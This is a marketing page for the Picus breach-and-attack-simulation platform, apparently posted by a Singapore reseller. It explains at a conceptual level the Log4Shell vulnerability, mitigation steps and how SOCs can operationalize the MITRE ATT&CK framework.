The Complete Security Validation Platform

The Picus Security Control Validation Platform is a Breach and Attack Simulation (BAS) solution that helps you measure and strengthen cyber resilience by automatically and continuously testing the effectiveness of your prevention and detection tools.

Latest Blog Posts

How can You Benefit from the Most Complete
Security Control Validation Platform?

Test your Security Controls 24/7

Picus identifies threat prevention and detection weaknesses by assessing the effectiveness of your security tools on an ongoing basis (and on-demand).

Validate Readiness Against The Latest Threats

With a rich threat library, updated daily by offensive security experts, Picus tests your defenses against current and emerging attack techniques.

Optimize Prevention & Detection Capabilities

To achieve optimal protection from your network and endpoint security tools, Picus supplies easy-to-apply signatures and detection rules.

Show the Value of your Investments

Supplying real-time metrics, including an overall security score for your organization, Picus helps you to measure performance and prove value.

Operationalize MITRE ATT&CK

Picus maps assessment results to the MITRE ATT&CK framework, enabling you to visualize threat coverage and prioritize mitigation of gaps.

Improve SOC Efficiency and Effectiveness

Picus automates manual assessment and engineering processes to reduce fatigue and help your security teams work together more collaboratively.

Download White Papers and Reports to learn more about the Picus Security Validation Platform

Download the BAS White Paper to learn more

New Field

8 + 4 =

What is Breach and Attack Simulation?

According to Gartner, “Breach and Attack Simulation technologies address a variety of use cases for security and risk management teams.”

Read this Gartner report, ‘What Are the Top Use Cases for Breach and Attack Simulation Technology?’, to learn about the key ways BAS can measure and strengthen your organization’s cyber resilience.

Also discover:

  • Defining features of a BAS tool
    Important questions that BAS can answer about your security
  • How BAS compares to pen testing and vulnerability scanning

Access the Gartner Report

New Field

15 + 1 =

See how the Picus Security Validation Platform tests your security controls for Log4shell exploits and Operationalize MITRE ATT&CK Framework in your SOC.

What is Log4Shell Vulnerability?

Apache Log4j is a widely used Java library used in many commercial and open-source software products as a Java logging framework. The CVE-2021-44228 is a remote code execution (RCE) vulnerability that can be exploited without authentication. The vulnerability’s criticality is rated as 10 (out of 10) in the common vulnerability scoring system (CVSS).

The vulnerability exists due to the Log4j processor’s handling of log messages. Apache Log4j2 versions between 2.0 and 2.14.1 do not protect against attacker-controlled LDAP (Lightweight Directory Access Protocol) and other JNDI (Java Naming and Directory Interface) related endpoints. If an attacker sends a specially crafted message, this may result in the loading of an external code class and the execution of that code (RCE).

What are the 4-steps for the immediate mitigation for log4j attacks?

It seems that we will be talking about Log4j for weeks, maybe months to come. Even though a patch for the first Log4j vulnerability (CVE-2021-44228) was released on December 10th, another Log4j vulnerability (CVE-2021-45046) was found on December 14th, 2021.

  1. Secure public-facing critical assets first
  2. Validate network security controls
  3. Utilize your network security controls
  4. Keep your assets up-to-date but continue to simulate attacks and harden your perimeter security

TEST YOUR SECURITY CONTROLS TO PREVENT LOG4SHELL EXPLOITS WITH PICUS

  • Simulate Log4Shell exploits
  • Test your WAF, IPS, and NGFW against Log4j attacks
  • Uncover gaps in your security controls
  • Enable provided prevention signatures to fix gaps
  • Secure your network against Log4j attacks
  • Continuously validate your security controls and Log4j resilience.

Operationalizing the MITRE ATT&CK Framework for Security Operations Centers (SOCs)

The MITRE ATT&CK Framework is a globally accessible public knowledge base based on real-world observations of adversary operations.

MITRE ATT&CK systematically defines and organizes Tactics, Techniques, and Procedures (TTPs). MITRE ATT&CK has become a common language between security teams to describe TTPs. The other important aspect of MITRE ATT&CK is that it is a community-driven initiative; therefore, it is a compelling framework as the whole global security community can contribute to it. The other aspect of the MITRE ATT&CK framework is that it is not static. The framework expands as new MITRE ATT&CK techniques and tactics are observed.

This video includes the first section of the Operationalizing the MITRE ATT&CK Framework for Security Operations Centers (SOCs) Course of Purple Academy by Picus. It is a micro-course designed for busy professionals. These courses are short (around 1 hour), focused on a particular topic, accessible 24/7, and offered in a convenient, self-paced format. Students who complete a course receive a verifiable badge and certificate.

In the MITRE ATT&CK Matrix for Enterprise, each column represents a tactic (the adversary’s technical goals). To achieve these goals, adversaries use different methods, which are called MITRE ATT&CK techniques. MITRE ATT&CK provides valuable information for each technique and sub-technique, such as metadata, procedure examples, mitigations, and detection to help security teams.

MITRE ATT&CK also provides threat groups that are related to an intrusion activity, as well as software utilized by these threat groups. Briefly, in the life cycle of a cyber attack, a Threat Group uses some techniques or sub-techniques to accomplish their goals (tactics), manually or via some software.

Let’s focus on how MITRE ATTACK can be operationalized. MITRE suggests operationalizing the ATTACK framework in four use cases. The first use case is ‘Threat Intelligence’, which is using ATTACK as a threat intel source. The second one is ‘Adversary Emulation’, which includes using ATTACK to assess your defenses and red teaming. The third use case is ‘Gap Analysis’. In this use case, we use ATTACK to identify defensive gaps. The fourth one is ‘Detection & Analytics’, which includes addressing the identified defensive gaps.

In order to learn how to operationalize MITRE ATT&CK via the four use cases for red teams, blue teams, and purple teams, you can visit the ‘Operationalizing MITRE ATT&CK for SOCs’ course in Purple Academy, which is a give-back project of Picus Security to provide open-access (free) cybersecurity courses to the community. Students who complete the course receive a verifiable certificate as recognition of their efforts. They also earn Continuing Professional Education (CPE) credits.

Contact Us

1003 Bukit Merah Central, #07-04 Inno Centre, Singapore 159836

[email protected]

fb.me/BitCyberSG

linkedin/company/BitCyber

t.me/BitCyberSG

How can we help you?

New Field

14 + 3 =

Call Now
Email Us
WhatsApp
Telegram